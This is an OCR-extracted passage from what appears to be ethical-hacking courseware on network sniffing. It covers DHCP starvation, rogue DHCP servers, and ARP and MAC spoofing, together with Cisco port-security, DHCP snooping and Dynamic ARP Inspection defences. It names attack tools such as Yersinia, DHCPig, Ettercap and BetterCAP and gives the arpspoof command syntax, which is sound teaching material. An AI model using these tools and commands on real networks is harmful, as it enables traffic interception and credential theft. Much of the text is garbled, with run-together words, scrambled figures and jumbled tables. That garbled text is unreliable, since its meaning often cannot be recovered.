Mackin ©by E-Comel
Copyright
Therelay in theclient’s
DHCPOFFER/ADVERTISE
agentbroadcasts subnet.
DHCPREQUEST/REQUEST
Theclient broadcasts asking
the DHCPserver to provide
the
DHCPconfiguration
information.
TheDHCPserver sendsa unicast DHCPACK/REPLY to
message the clientwith the IP
configuration
andinformation,

Figure8.25: ofDHCP
Working

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DHCPRequest/Reply
Messages

DHCPRequest/Reply
Messages
A devicethat already hasan IPaddresscan use the simple request/reply exchange to obtain
otherconfiguration parameters froma DHCPserver. Whenthe DHCPclientreceives a DHCP
offer,the clientimmediately responds bysending backa DHCP request packet.Devices that are
not usingDHCPto acquireIP addresses otherconfiguration
can stillutilizeDHCP’s capabilities.A
client can broadcast@DHCPINFORM message to requestthat any availableserver send its
parameters on the usageof the network.DHCPservers respond with the requested parameters

that a
and/or default parameterscarriedin DHCPoptionsof DHCPACK message. If aDHCPrequest
comes from a hardware
address
DHCPserver can putthat IP address
is i n the DHCPserver'sreserved
not for the IP addressthat this DHCPserver offered,
backinto the pool
poolandthe requestis
the DHCPserver’s offer is invalid.The
andoffer it to anotherclient.

DHCP
va DHCPV6

| Message
Message Description

__|
DHcPDiscover Solicit

to with
Clientbroadcast
to locatetheavailable
DHCPservers
Serverto clienti n response DHCPDiscover the offerof

| ||
DHcPoFer Advertise

Request,
configuration
Client
t o
parameters
servers either(a)requesting (b)
offeredparameters,
| _|| the
leasepreviously
allocated
period address,
DHCPRequestConfirm, confirming the correctness
Rebind (c)extending
Renew,
ofthe or

Serverto clientwith configuration including

ACK | parameters, the
DHCP Reply committednetworkaddress

DHcPRelease
| Release
|Clientto server relinquishing
case
ical
andcanceling
thenetworkaddress

andCountermensores ©by E-Comel

Mackin Copyright
 | _|Client
server
indicating
DHcPDecline Decline
that already to thenetworkaddressi
Serverto clientsayingthat it hasnew or updated configuration
in use

N/A Reconfigure
Theclientthensendseither a renew/reply
settings.
Information-request/reply
information
or
transactionto getthe updated

| client
| __|
DHCPInform server
hasonly
local
configuration
parameters
Information Clientto
externally
network
“Request alreadythe
asking for
configured address
the

Arelay
agentsendsa relay-forward to relay to

|sryers,
directly
message messages
w/a Relay-Forward either or through
anotherrelayagent
Ni
|A Relay
Reply
server sendsa relay-reply
message thatthe relay
message to a relay
agentcontaining
agentdeliverstoa client
3

N/A
DHCPNAK ofServerto clientindicating
addresss incorrect (e.g,
that the client’s
notion the network
the clienthasmovedto a new subnet)
leasehasexpired
the client’
or

8.8:
IPv4 DHCPPacketFormat
request/reply
Table DHCP messages

DHCPenablescommunication on an IP network byconfiguring networkdevices.It assignsIP

addresses andother informationto computersso that theycan communicate on the network
in the client-servermode.DHCP hastwo functionalities: host-specific
delivering configuration
parameters andallocatingnetworkaddresses
to hosts.
A series of DHCPmessages
DHCPmessages
is usedi n communication between
havethe same formatas that of Bootstrap
becauseDHCPmaintains its compatibility
DHCP

with BOOTPrelay
Protocol(BOOTP)serversandDHCPclients.
messages.
thus eliminating
agents,
Thisis
the need
to change
the BOOTPclient'sinitializationsoftwareto interoperate
with DHCPservers.

‘Wane 10900)

‘Yow
addres
ADDR) W

Adress
‘ete (BOON)

ServerName (AME) yes

foemat
6.26:1Pv8DHCPpacket
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
table detailseveryfieldoftheIPv4DHCP
message:
FIELD octets DESCRIPTION

Opcode This
contains
field
message opcode
that
represents
the message
type:opcode"1―
lent, while “2―
represents
represents
messages
sentbytheserver
responses
the
sentbythe

Hardwareaddresstypedefinedat the internetAssigned

Type
HardwareAddress

Length
HardwareAddress
Authority
(e.g,
Numbers
"2" (ANA)
Hardwareaddresslength
i n octets
=
10MbEthernet)

Hops DHCP
clients
In general,
the

ofagents
optionally
set thevalueto “0―;
usedto countthe number relay
forwardedthe message
however,
that

ID (X10)
Transaction number
ischosen
request by
‘A.andom
the
clientthe
andtheir responses
messages
to associate
betweena clientand

Seconds elapsed
Seconds since thecient began
theaddress
or renewalp rocess
acquisition
Flags receive set For client
Flags bytheclient; example,
if the cannot
flagsset
thenthe broadcast
unicastIP datagrams,

(CIDDR)
ClientIPAddress

YourIPAddress(VIADDR)
Usedwhenthe
ARPrequests client
addressassigned
hasan IPaddressandcan respond
to

‘The bytheDHCPserver to theDHCPclient

(SIADOR)
ServerIP Address Server's
IPaddress
Gateway
IPAddress(GIADA) TheIPaddressof theDHCPrelay
agent
ClientHardwareAddress
16 Thehardwareaddressof theclient
(cHaDoR)
Server
File
Name(SNAME) 6a
server
‘Optional hostname
Name

Options
DHCP
128
Variable
of
Name the file containingBOOTP
client's boot image

Table
89: Fels
of
14 DHCPmessage

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DHCPStarvationAttack

theoe
Goan
Por
lee
thence
bonds ues oes

(a. Therefore, ena

ron uer abet an

Sinemet socks
® net
eter hess

DECPStarvationAttack
In a DHCPstarvation attack,an attackerfloodsthe DHCP server bysending numerous DHCP
requests andusesall oftheavailable IP addresses
thatthe DHCPserver can issue. Asa result,
the server cannot issueany more IP addresses,
leadingto a DoSattack.Because of this issue,
validuserscannotobtainor renew
attackerbroadcasts DHCPrequests their
with spoofed
thus,theyfailto accesstheir network.An
IP addresses;
MACaddresses with the helpof toolssuchas

>
ED
out
of?
OH Server
Serverrans

* Pe;
.

% searesss to allocate
% t o validusers,
‘valid
IPaddress
o s
ay DHCPScope
10,10.10.1
10,10.10.2

Attacker
sends
many
ferent OHCP
requests
with manysource MACS
10,10,10.3

‘attackerFigure8.27:
DHCP
starvation attack
10,10.10.254

8
Module 1117
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 StarvationAttackTools
DHCP
DHCPstarvation attacktoolssenda largenumberof requeststo a DHCPserver, leading to
exhaustionof the server'saddresspool.Subsequently,
the DHCPserver is unableto allocate
configurationsto new clients.
=
Yersinia
Source:https://sourceforge.net
Yersiniais a networktool designed to take advantage of weaknesses
i n different
network protocolslike DHCP.It pretends to be a solidframeworkfor analyzing and
thedeployed
testing networksandsystems, As showni n the screenshot,
attackers use
Yersiniato perform
a DHCP starvation attackon the targetsystem,

Figure8.2;Screenshot
ofYersinia
Someexamples
of DHCP
starvation attacktoolsare listedbelow:
+
(https://sourceforge.net)
Hyenae
+
(https://aithub.com)
dhepstary
+
(https://sourceforge.net)
Gobbler
(https://github.com)
DHCPig

Modul
8 1118
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 DHCP ServerAttack
Rogue

‘atener
nogcompreaced
Thistle wots wth he
conection
nn nnn

ONCP taaton
nononer

attackhe tar sends

hh hepsi?
@OMSPreqwess

a
ies

TCI etingothe ee

DHCPServerAttack
Rogue
In additionto DHCPstarvation attacks, an attackercan perform MITM attackssuchas sniffing,
attacker
‘An whosucceeds in exhausting the DHCPserver’sIP addressspacecan set up a rogue
DHCPserver on the network, whichis not underthe controlof the networkadministrator.The
rogueDHCPserver impersonates a legitimateserver and offersIP addresses
andothernetwork
informationto otherclientsi n the network, actingas a defaultgateway. Clientsconnectedto
the networkwith the addresses assigned bythe rogueserver will now becomevictims of MITM.
andother attacks, whereby packets forwardedfrom a client'smachinewill reachthe rogue
server
first.
In a rogueDHCP server attack,
rogue server can respond
actualDHCPservers respond
an
attacker
willintroducea rogueserver into thenetwork.
DHCPdiscovery
to clients’ requests.
to the request,the clientaccepts
Although
This
both the rogue and
the response that comes first. In
the case wherethe rogueserver responds earlierthanthe actualDHCP server,the clienttakes
the responseof the rogueserver. Theinformationprovided to the clientsbythis rogueserver
can disrupt
their networkaccess, causinga DoSattack,
TheDHCPresponse from the attacker'srogue DHCPserver may assign the IP addressthat
servesas a client's defaultgateway. As a result,theattacker'sIPaddress receives all the traffic
fromthe client.Theattackerthen captures all the trafficand forwardsit to the appropriate
defaultgateway. Theclientthinksthat everything
difficultfor theclientto detectfor longperiods.
is functioning
correctly.
This of attackis
type
Sometimes, the clientuses a rogue DHCP
server insteadof the standardone. Therogue server
directs
theclientto visit fakewebsites
i n an attemptto gaintheircredentials.

Modul
8 1119
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
To mitigatea rogueOHCPserver attack, set the connection betweenthe interface and the
rogue server as untrusted.Thisaction will blockall incoming DHCP server messagesfromthat
interface.

Figure8.23:
DHCP
Rogue server attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst
DHCPStarvationand Rogue
Server 7

Attacks
Enable
port
security
against snooping,
CEH
athe
directed
"© to defend DHCP staratn Enable OHCP whichlows switchto accent
tics {ONCEranatcton fom uted port

How to DefendAgainst
DHCPStarvationand Rogue
ServerAttacks
DefendAgainst
DHCP
Starvation
Enableportsecurityto defend against a DHCPstarvation attack. Port security limits the
maximum number of MACaddresses on the switchport.When thelimit is exceeded,
the switch
drops subsequent
MACaddressrequests (packets)fromexternalsources,whichsafeguards the
aDHCP
server against starvation attack.

User
830: Defending
Figure 9 HCPstrvation
agninst attack

Internetwork
Operating (10S)
System SwitchCommands
Source:https://www.cisco.com
+
switchportport-security
The switchport port-security commandconfigures
the switchportparameters
to enableportsecurity.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 switchport port-security maximum 1
The ewitchport port-security maximum commandconfigures
the maximum
forthe port.
numberof secure MACaddresses
The ewitchportport-security maximum 1 commandconfigures
the maximum
numberofsecure MACaddresses
forthe port as 1.
ewitchportport-security violation restrict
The switchport port-security violation commandsets the violation mode
andthe necessary
action in caseof detectionof
Theswitchport port-security violation
asecurity
violation.
restrict commanddrops
packets
withunknown
s ource addresses
untila sufficient
numberof secure MACaddresses
are
removed.
switchport port-security aging time 2
The switchport port-security aging time commandconfigures
the secure
MAC
address agingtime on theport.
Theswitchport port-security aging
2 minutes.
time 2 command
sets
the agingtime as

switchport port-security aging type inactivity

The switchport port-security aging type commandconfigures
the secure
MAC
addressport.
agingtypeon the
The switchport port-security aging type inactivity commandsets the
aging
as aging.
type inactivity
switchport port-security mac-address sticky
Thiscommandenablesstickylearning on the interface byentering onlythe MAC-
addresssticky
keywords. Whensticky is enabled,
learning the interface
addsall secure
MACaddresses that are dynamically
learnedto the running configuration
and converts
theseaddressesto sticky
secure MACaddresses.
DefendAgainst
Rogue
ServerAttack
TheDHCPsnooping featurethat is availableon switchescan mitigateagainstrogue DHCP
servers. It is configured
on the port on whichthe valid DHCP server is connected.Once
configured, DHCPsnoopingdoes not allow other portson the switchto respond to DHCP
Discover packets sent byclients.Thus,
even an attackerwho manages to build a rogueDHCP
server andconnectsto theswitchcannot respond to DHCP packets
Discover

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Trusted

Untretes ED)
once
baie

‘Attacker
a 8.31:Defending
Figure
Us

againstrogueserver attack
10SGlobalCommands
Source:https://www.cisco.com
to configure
Steps DHCPsnooping
1 ip dhep snooping
DHCPsnoopingglobally
Enables
ip dhep snooping vlan number [number] | vlan {vlan range}]
Enables
or disablesDHCP
snoopingon one or more VLANs.For example:
ip dhep snooping vlan 4,104
ip dhep snooping trust
Configures
the interfaceas trustedor untrusted.
ip dhcp snooping limit rate
Configures packets
the numberof DHCP persecond(pps)
that an interfacecan receive,
end
Exitsconfiguration
mode.
show ip dhcp snooping
Verifies
the configuration
AdditionalDCHP
snooping command:
no ip dhcpsnooping information option
Todisablethe insertion andthe removalof the option-82
field,u se the no ip dhep
snooping information option i n global configuration
command.To configure an
aggregation, switch to dropincoming DHCPsnooping packets with option-82
informationfrom an edge switch, IP dhcp
and use the “no snoopinginformationoption
global
allow-untrusted―configuration
in VLAN
Note: All ports the
are
command,
untrustedbydefault

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What Is AddressResolutionProtocol(ARP)?
es pote a eres
ashing
tomaine A] ees

ARP Poisoning
SniffingTechnique:
Thissection discussesthe ARPpoisoningtechniquegenerallyusedbyattackersto perform
sniffing
o n a targetnetwork. Using
this method,
an attackercan steal sensitive information,
preventnetworkandwebaccess,andperform DoSandMITM attacks usingsniffing,
What Is Address Resolution Protocol (ARP)?
AddressResolutionProtocol(ARP) is a statelessTCP/IP protocol
that maps IP network
addresses to the addresses (hardware addresses)used bya data link protocol. Using this
protocol,
Apart
a user can easily
obtainthe MAC addressof anydeviceon a network.
addresses.
switch,the hostmachinesalsouse the ARPprotocol forobtaining MAC
fromthe
ARPis used
by tosent.
packet
packet another
device,
the hostmachinewhenit wants senda to andhasto mention the

ofthe address
destinationMACaddressi n the Therefore,to write thedestinationMAC in

the
the packet, host machine
alsomaintainsthe MACaddress
shouldknowthe MACaddress
table(ARP table}.
destinationmachine.TheOS

of obtaining
Theprocess the MACaddressusingARPis asfollows:
=
The source machinegenerates a n ARPrequestpacket containing the source MAC
address, anddestinationIP address,
source IPaddress, andsends
i t to theswitch,
theswitchreadsthe MACaddressof the source andsearches
On receivingthe packet,
for in
thisaddress its CAMtable.
Theswitchupdates all the new entries i n it. If the entryis not found i n the table,
the
switchaddsthe MACaddressand its respective incomingport to its CAMtable and
broadcasts
the ARPrequest packetinto the network,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Eachdevicein thenetworkreceives the broadcast ARPrequestpacket
andcompares
the destinationIPaddressi n the packet
with its own IPaddress.
Onlythe systemwith an IP addressthat matchesthe destination IP addressreplies
with
an
ARP
reply
TheARPreply
packet
messageis thenreadbythe switch, whichaddsthe entryto its MACtable
andforwards the message to thedestination
machine, i.e,, the machinethat sent the
ARPrequest.
Further, this machineupdates
the destinationmachine’s
IP and MAC addressentries
into its ARP table,
take
andnow communication can place.

|
want to connect
but |
to 10,10.10,3,
Malo eaaihe
ARP
REQUEST
MACadress of
10.1003,
10:10.10.10.1
needMAC address
MAC00-1420.01.23-45
ARPREQUEST
Hello, need the MAC
address
of 10,10.10.3.
>
110:10.10.102
110:1945467.10
MAC O0:Ib:s8:6442:06
ARPREQUEST
AA

sueresestsnseseseeey
10:10.10.10.3
coseeennneeeennneesens®
Estabished
‘Connection
MAC:00-14-20-01-23-47

example
Consider
an ARP
ARP 8.32:Working
Figure
that showstwo machines
of

connected
protocol
in a network.
Therespective
hostnames,
IPs,
andMACaddresses
are:

HostName
A
P
194.54.67.10
Mac
00:1b:48:64:42:64
8 192.54.67.15 00-14-20-01-23-47
Before with hostB,hostA firstchecks
communicating fora record
of hostB'sMACaddressi n
theARPcache.If hostA findsthe recordof MAC
it hasto accesshostB’s
B.Otherwise, MACaddress a address,
it
communicates
usingARPprotocol.
directly
with host

HostA queriesall the hostson the LAN.If the query were phrasedin plain
English,
it might
soundlike this: “Hello,
who is 192.54,67.15?This is 194.54.67.10. My MAC addressis
00:1b:48:64:42:e4.| needyour MACaddress.―
Here,
hostA sendsa broadcastrequestdata packet to host8. On receivingthe ARPrequest
packet,
hostB updates IP and MAC addresses,
its ARPcache tablewith hostA’s andsendsan

ical andCountermensores
Mackin ©by E-Comel
Copyright
ARPreplypacket
to hostA thatwouldbephrased
i n English
as, "Hey,
thisis 192.54.67.15;
my
MAC
is
address 00-14-20-01-23-47.―
(On receivingthe ARP reply, updates
host A its ARP cachetable with host B's IP and MAC
After establishing
addresses, thesetwo hostscan communicatewitheachother.
a connection,

Prompt
IB Command

Figure8.33:
ARPcache

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ARP Spoofing
Attack

‘an
be |
packetscanforgedto MowDoes
ARP
Work
Spoofing

racers fooda tarst

forged
entries, which
0

ARPSpoofing
Attack
ARPresolvesIP addresses to the MAC(hardware) addressof the interfaceto senddata,ARP
packets can be forged to senddata to the attacker's machine. ARPspoofing involves
constructinga largenumberof forged ARPrequestand replypackets to overloada switch
Whena machine sendsa n ARPrequest, it assumesthatthe ARPreply will come fromthe right
machine.ARPprovides no means of verifying the authenticityof the responding device.Even
systemsthat have not madean ARP requestcan accept the ARP replies comingfrom other
devices,Attackersuse thisflaw in ARPto create malformedARPreplies containing spoofed IP
and MAC addresses. Assuming it to bethe legitimate ARPreply, the victim’s
computer blindly
acceptsthe ARPentryinto its ARPtable. Oncethe ARPtable is floodedwith spoofed ARP
the switchis set i n forwarding
replies, mode, andthe attackerintercepts all the datathat flows
fromthe victim’s
machinewithoutthe victim being aware ofthe attack.Attackersflooda target
computer's ARPcachewith forged entries,whichis alsoknownas poisoning.ARPspoofing is an
intermediaryforperforming attacks suchas DoS,MITM,andsessionhijacking,
HowdoesARPSpoofing
Work?
ARPspoofing
a
is a methodof attacking
sessionwithanother
requestusingthe recipient's
an EthernetLAN.When legitimate
u ser i n the same layer
IP address,
2 broadcast domain,
user initiates a
theswitchbroadcasts
while the senderwaits for the recipient
an ARP
to respond

eavesdropping
with a MACaddress.
can respond
An attacker
to the broadcast
recipient’s
ARPrequest
on thisunprotected
and replies
layer2 broadcast
to the senderbyspoofing
IP address.The attackerruns a snifferand turns the machine’s
domain
the intended
NIC adapter to

promiscuous
ARPspoofing
mode
is a methodof attacking bychanging
an EthernetLAN.It succeeds the IPaddress
of the attacker'scomputer A forged
to that of the targetcomputer. ARP request and reply

8
Module 1127
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 can finda place
packet i n the targetARPcache i n this process.
As the ARPreplyhasbeen
forged,
the destinationcomputer (target)
sendsframesto the attacker'scomputer,wherethe
attackercan modify
the framesbeforesending them to the source machine(UserA)i n an
MITM attack.Theattackercan alsolauncha DoSattackbyassociating a non-existent MAC
address
to the IP addressof the gateway; alternatively,
the attackermay sniffthe traffic
passively
andthenforwardit to the targetdestination,

ARPcache
Poisoned

Sa Sere
Gaarmeacre scutes
ers | sotes
Switch

cones @ seraeromated

$ latimetewer

nto
GEES)
te
c
sre Attacker

Figure834:Working
of an ARPspoofing
attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Threatsof
ARP
Poisoning
(©
Using
fake divert
exchanged
trafficbeing all between
ARPmessages,
two
machines,
an atacker
via in
can
theatacke’s
PC
communications resultingall

Ehreciting EEots interception

Hijacking
Session Hijacking
Connection

VoIPcallTapping Resetting
Connection

‘Manipulating
Data Stealing
Passwords

‘Man-in-the-Midde
Attack Service(Dos)
Denial-of Attack

ARP
‘Threats
of
Poisoning
With the helpof ARP poisoning, an attacker can use fake ARPmessagesto divert all
communicationsbetweentwo machines so thatalltrafficredirectsvia theattacker's
PC

‘The poisoning
threatsof ARP
Packet
Sniffs
traffic apart
Sniffing:
of
include:
over a networkor the network,
SessionHijacking:
Stealsvalid session informationand uses it to gain unauthorized
toaapplication
n
access
VoIP Call Tapping: Usesport mirroring,which allowsthe VoIP call tappingunit to
monitor all networktraffic,
andpicksonlythe VoIPtrafficto recordbyMACaddress.
‘Manipulating
Data:ARPspoofing
allowsattackers andmodify
to capture data,or stops
the flowof traffic.
Attack: An attackerperforms
‘Man-in-the-Middle a MITM attackwhere theyreside
betweenthevictim andserver:
DataInterception: IPaddresses,
intercepts MACaddresses,
andVLANsconnectedto the
switchi n a network,
ConnectionHijacking:In a network,thehardware are supposed
addresses to beunique
and fixed,but 2 hostmaymove whenits hostnamechangesand use anotherprotocol
In connection hijacking,an attacker can manipulate
a client's connection to take
complete control
ConnectionResetting:
The wrong routinginformationcouldbe transmitteddue to a
hardware/software
to
error. In suchcases,if a hostfails initiate a connection,
that host

ical andCountermensores
Mackin ©by E-Comel
Copyright
shouldinformtheAddress Resolutionmoduleto deleteits information.Thereceptionof
datafromthat hostwill reset a connection timeout i n the ARPentryusedto transmit
datato thathost.Thisentryin the ARPmoduleis deletedif thehostdoesnot sendany

Stealing
for
a
information
Passwords:
of
certain periodtime.
An attackeruses forged
ARP replies
and trickstargethostsinto
sending
sensitive informationsuchas usernamesandpasswords.
DoSAttack:Linksmultiple with a single
IP addresses MACaddressof the targethost
that is intended
fordifferentIP addresses, with a huge
whichwill beoverloaded amount
of traffic,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools
ARP Poisoning

ARPPoisoning
Tools
+
arpspoof
Source:https://linux.die.net
arpspoof packets
redirects from a targethost(orall hosts)
on the LAN intended
for
anotherhoston the LANbyforging
ARPreplies.
Thisis an extremely
effectiveway of
sniffing
trafficon a switch.
Syntax:
arpspoof- i [Interface] -t [TargetHost]
shownin the screenshot,
‘As attackersu se the arpspooftool to obtainthe ARPcache;
then, the MACaddressis replaced with that of an attacker'ssystem. Therefore,
any
trafficflowing
from the victim to the gatewaywill be redirected to the attacker's
system.
Further,
an attackercan issue the same commandi n reverse as he/she
is i n the middle
andcan sendARPreplies
in bothdirections.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the of
stacers
laced
witht
tem

Someexamples
of
Figure35:Screenshotrppoot
of ARPpoisoning toolsare listedbelow.
+
BetterCAP(https://www.bettercap.org)
+
(hitp://www.ettercap-project.ora)
Ettercap
dsr (https://www.monkey.org)
MITME(https://github.com)
(https://sourceforge.net)
Arpoison

Module
8 1122
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 How to DefendAgainst
ARP Poisoning
Implement
Dynamic
ARPInspection
Using
DHCPSnooping
Binding
Table

SS st

on
ag (ee See
How to DefendAgainst
Implementation of Dynamic
ARP
Poisoning
ARPInspection (DAI)prevents poisoning attacks.DAlis a security
featurethatvalidatesARPpacketsi n a network.WhenDA\ activates on a VLAN, o n the
all ports
VLANare consideredto be untrustedbydefault.DAIvalidatesthe ARPpackets using a DHCP
snoopingbinding table. The DHCP snoopingbinding table consistsof MAC addresses, IP
addresses,andVLANinterfacesacquired bylistening
to DHCP message exchanges. Hence,you
must enable DHCP snoopingbefore enabling DAI. Otherwise, establishinga connection
betweenVLANdevicesbasedon ARPis not possible. Consequently, a self-imposed DoSmay
resulton
any
device VLAN.in that
To validatethe ARP packet, the DAI performs IP-address-to-MAC-address binding inspection
storedi n the DHCPsnooping databasebefore forwarding the packetto its destination.If any

a address,
invalid IP address binds MAC
riskof MITMattacks.DAIensuresthe relay
the DAI will discardthe ARPpacket.
of onlyvalidARPrequests the
Thiseliminates
andresponses,
If the hostsystems in a networkhold static IPaddresses, DHCP snoopingwill not be possible, or
other switches in thenetwork cannot run dynamic ARPinspection. In suchsituations,you have
to perform
static
mapping
aanARPpoisoning an toa
attack. on
a
that associates IPaddress MACaddress VLANto prevent

Software c an be implemented that runs custom scripts to monitor ARPtables.Thisscriptcan

comparethe current ARPtable to the list of known MACand IP addresses. If there is
mismatch i n the list of valid MAC/IP pairs,the switch will drop the packet. Suchscriptsare
helpfulin defending againstARPpoisoningattacksby monitoringthe MAC/IP pairs on
important LANmachines suchas servers andgateways.
The implementation of cryptographic protocols suchas HTTP Secure (HTTPS), Secure Shell
(SSH), Transport Layer Security (TLS),and various other networking cryptographic protocols
ical andCountermensores
Mackin ©by E-Comel
Copyright
preventsARPspoofing data beforetransmission and authenticating
attacksbyencrypting it
after itis received,

8.36:Defending
Figure ARPpoisoning
against

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DHCPSnooping
Configuring and Dynamic
ARPInspection
on CiscoSwitches

Configuring
‘Assnooping
discussed,
ARP
DHCPSnooping
DHCP
andDynamic Inspection

snooping
on CiscoSwitches
must beenabledbeforeenabling DAI.DHCP is a security
featurethat buildsand maintains a DHCPsnoopingbinding table andfilters untrustedDHCP
messages. ACiscoswitchwith DHCP snoopingenabledcan inspect
DHCP trafficflowat a layer2
segment andtrackIP addressesto switchportmapping,
To configure DHCPsnoopingon a Ciscoswitch,
ensure DHCP bothglobally
snoopingis enabled
andper access VLAN.ToenableDHCP snooping,execute the following
commands:
Configuring
Switch
DHCP snooping inglobal
configuration
(config)#ip dhep snooping
mode

Configuring
DHCPsnooping
for VLAN
a
Switch (config)# ip dhepsnooping vian 10
Switch (config) # “2
Toview the DHCP
snooping status
Switch show ip dhepsnooping
Switch DHCPsnooping is enabled
DHCPsnoopingis configuredon following VLANs: 10
DHCPsnooping is operational on following VLANs: 10
DHCPsnooping is configured on the following 13 Interfaces

DHCPsnooping trust/rate is configured on the following Interfaces:

Interface Trusted Rate limit (pps)

ical andCountermensores
Mackin ©by E-Comel
Copyright
Iftheswitchis
functioning
only at layer
the layer2 interfacesto designate
switchthatDHCP responses
2,applythe ip dhep snooping trust command

can arrive on thoseinterfaces.

to
uplinkinterfacesas trustedinterfaces.Thisinformsthe

TheDHCPsnoopingbinding table contains the trustedDHCPclientsand their respective IP

addresses.To view the DHCP
snooping
table, you haveto execute the following
Switch (config) # show ip dhcp snooping binding
command:

Thisdisplays the DHCPsnooping table, which contains the MAC addresses, IP

respective
addresses,andtotal numberof bindings. Thefollowing is an example of a DHCPsnooping
binding
table:
MAC Address IP Address Lease (sec) Type
ran Interface

ta:12:3b:2f;d€:1e 10.10.10.8 125864 dhep-snooping 4 —-FastEthernet0/3,

Total nusber of bindings: 1
Afterestablishing snoopingbinding
a DHCP table,the user can start configuring
DAI forthe
VLAN.ToenableDAlfor multiple
Command
toconfigure
ARP
VLANs,
specify
a range of

for a VLAN
inspection
VLAN numbers.

Switch (config)#ip arp inspectionvlan 10

Switch (config)# “Z
Command to configure
ARPinspectionfora rangeofVLANs
Switch (config)#ip ap inspection vian 10, 11, 12, 13
or
Switch(config)#ip arp inspection vlan 10-13
To
viewthe ARPinspection
status
Switch (config)#show ip arp
Source Mac Validation
inspection
Disabled
Destination Mac Validation :
Disabled
IP Address Validation Disabled
Vian Configuration Operation ACL Match Static ACL.
10 Enabled Active
Vian ACL Logging DHCPLogging Probe Logging
10 Deny ore
Vian Forwarded Dropped DHCPDrops ACL Drops
10 ° ° ° °
Vian DHCP Permits ACL Permits Probe Permits Source MAC Failures

10
Vian
10
°
Dest MAC Failures
°
°
IP Validation
°
°
Failures Invalid
°
Protocol
°
Data

Fromthis IP ARPinspection result,itis clearthat the source MAC,destinationMAC,and IP

addressa re disabled.Evenmore security c an be attainedbyenablingone or more of these

ical andCountermensores
Mackin ©by E-Comel
Copyright
additionalvalidation checks.
To do so, execute the commandip arp inspection
validate followedbythe address
type.
Assumethat an attackerwith the source IP address 192.168.10.1connects to VLAN 10 on
interfaceFastEthernet0/S andsendsARPreplies, pretending to be the default router for the
subneti n an attemptto initiate an MITM attack.Theswitchwith DAI enabled inspects these
replypackets bycomparing
entryforthesource IP address
theswitchdiscards
them
thesepackets.
with
DHCP
snooping
the
switch table.The
o n portFastEthernet0/S.
192.168.10.1
thentries to find an
If thereis no entry,then

‘$SH_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) o n Fa0/5, vlan 10

([0013. 6050. act4/192.168.10.1/feee. ¢£ff.££¢/192.168.10.1/05:37:31 UTC Mon
OL 08 2019))
If the discarding
of packets
starts,then the dropcount begins
to increase. You can see this
increase in
arp inspection
the drop
inthe
count To see the output,
DAI output.

Switch (config)# show ip arp inspection

execute the command
s how ip

Source Mac Validation: Disabled

Destination Mac Validation: Disabled
IP Address Validation: Disabled
Vian Configuration Operation ACL Match Static ACL.

Enabled
ACL Logging
Active
DHCPLogging Probe Logging

Deny Deny ore

Forwarded Dropped DHCP Drops ACL Drops
30 5 5 °
DHCPPermits ACL Permits Probe Permits Source MAC Failures

30 ° ° °
Dest MAC Failures IP Validation Failures Invalid Protocol Data

Module
8 1127
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 DetectionTools
ARP Spoofing

fovea

ARPSpoofing
DetectionTools
+
xarp
Source:http://www.
xarp.net
XArpis a securityapplicationthat detects ARP-based
attacks.
It detectscriticalnetwork
attacksthat firewallscannot cover. It uses advancedtechniquesto detectARPattacks
like ARP spoofing. The detection mechanismrelies on two techniques: inspection
modulesand discoverers.Inspection moduleslook at ARPpackets and checktheir
correctness and validityconcerningthe databasestheyhave built up. Discoverers
actively validate IP-MAC mappingsand actively detect attackers.The mechanism
detectsARPattacksand keeps data private.It even monitors wholesubnetsfor ARP
attacks.This application screens the wholesubnetfor ARPattacksusingdifferent
securitylevelsandfine-tuning A localnetworkthat is subject
possibilities. to ARPattacks
inspectseveryARPpacket andreports attacksagainst remote machines.
shownin the screenshot,
‘As professionals
security use XArp
to detectARPspoofing
attacksperformed
on the systems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure8.37:
Screenshot
of Karp
Someexamples
of ARPspoofing
detectiontoolsare listedbelow:
=
Capsa (https://www.colasoft.com)
NetworkAnalyzer
=
(https://sourceforge.net)
ArpON
‘ARPAntiSpooter
(https://sourceforge.net)
(hitps://github.com)
ARPStraw
(https://aithub.com)
shARP

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MACSpoofing/Duplicating

a
SniffingTechnique:
__

Attacks
Spoofing
f__.
BesidesARPspoofing,an attacker can alsouse MACspoofing, IRDPspoofing, VLANhopping,
and STPattacksto sniff the traffic of a targetnetwork.This section describesspoofing
techniques
that helpattackersto stealsensitive information.
Thissection alsoexplains
how to
MACspoofing,
defendagainst VLANhopping, andSTPattacks.
MAC Spoofing/Duplicating

MAC duplicating
legitimate
refersto spoofing
the network.A MAC duplicating aMAC
address
withaddress
of user
on the MAC
attack involvessniffing
a legitimate
a networkfor MAC addresses
clientsconnectedto the network.In this attack,the attackerfirst retrieves the MAC
of

addresses of clientswho are actively associatedwith the switchport. Then, the attackerspoofs
a MACaddress with the MACaddress client.Ifthe spoofing
of the legitimate is successful,
then
the attackerc an receive all the trafficdestinedfor the client.Thus, an attackercan gain access
to the network andtakeover theidentity ofsomeoneon the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 showshowan attackerperforms
Thediagram a MACspoofing/duplicating
attack.

Figure 8.38:
MACpoofine/duoicating
attack
Note:Thistechnique
can beusedto bypass
wirelessa ccesspoints’
MACfiltering.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MACSpoofing Windows
Technique:
start
InWindows fr Papel
1008
and
open
then ‘Chek ad search Control ase

{ype“ipconfig―
ort
confi in

romp
thecomma
vei the

MAC Spoofing Technique: Windows

